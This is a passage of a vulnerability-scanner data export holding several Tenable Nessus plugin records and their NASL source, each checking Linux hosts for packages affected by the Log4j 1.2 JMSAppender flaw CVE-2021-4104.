'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j12-javadoc-1.2.17-lp152.3.3.2', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j12-manual-1.2.17-lp152.3.3.2', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j12-mini-1.2.17-lp152.3.3.2', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j12 / log4j12-javadoc / log4j12-manual / log4j12-mini');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T03:46:22", "description": "The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2021-5206 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. 
Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-20T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : log4j (ELSA-2021-5206)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-07T00:00:00", "cpe": ["cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:log4j", "p-cpe:/a:oracle:linux:log4j-javadoc", "p-cpe:/a:oracle:linux:log4j-manual"], "id": "ORACLELINUX_ELSA-2021-5206.NASL", "href": "https://www.tenable.com/plugins/nessus/156206", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2021-5206.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156206);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/07\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"Oracle Linux 7 : log4j (ELSA-2021-5206)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2021-5206 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to 
deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2021-5206.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j, log4j-javadoc and / or log4j-manual packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:log4j-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:log4j-manual\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nvar pkgs = [\n {'reference':'log4j-1.2.17-17.el7_4', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-javadoc-1.2.17-17.el7_4', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-manual-1.2.17-17.el7_4', 'release':'7', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, 
el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j / log4j-javadoc / log4j-manual');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T03:45:22", "description": "The remote SUSE Linux SLES11 host has a package installed that is affected by a vulnerability as referenced in the SUSE-SU-2021:14866-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. 
(CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-18T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : log4j (SUSE-SU-2021:14866-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:log4j", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2021-14866-1.NASL", "href": "https://www.tenable.com/plugins/nessus/156167", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:14866-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156167);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:14866-1\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"SUSE SLES11 Security Update : log4j (SUSE-SU-2021:14866-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES11 host has a package installed that is affected by a vulnerability as referenced in the SUSE-\nSU-2021:14866-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. 
The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-December/009915.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8e463296\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES11', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! 
preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'log4j-1.2.15-26.32.17.1', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-11.4'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. 
Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T03:57:39", "description": "According to the versions of the log4j package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-03-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : log4j (EulerOS-SA-2022-1276)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-03-01T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:log4j", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1276.NASL", "href": "https://www.tenable.com/plugins/nessus/158462", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158462);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/01\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"2022-A-0029\");\n\n script_name(english:\"EulerOS 2.0 SP5 : log4j (EulerOS-SA-2022-1276)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the log4j package installed, the EulerOS installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. 
Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1276\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0d1353a8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"log4j-1.2.17-16.h2.eulerosv2r7\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j\");\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-05-18T17:06:27", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:1631-1 
advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-29T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : kafka (openSUSE-SU-2021:1631-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-05-18T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kafka-kit", "p-cpe:/a:novell:opensuse:kafka-source", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2021-1631.NASL", "href": "https://www.tenable.com/plugins/nessus/156340", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1631-1. 
The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156340);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/18\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n\n script_name(english:\"openSUSE 15 Security Update : kafka (openSUSE-SU-2021:1631-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:1631-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. 
(CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/4BQ3YNECTWF6XMIQDZ7C5QEDQ3QPQT4W/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5efa226f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kafka-kit and / or kafka-source packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kafka-kit\");\n 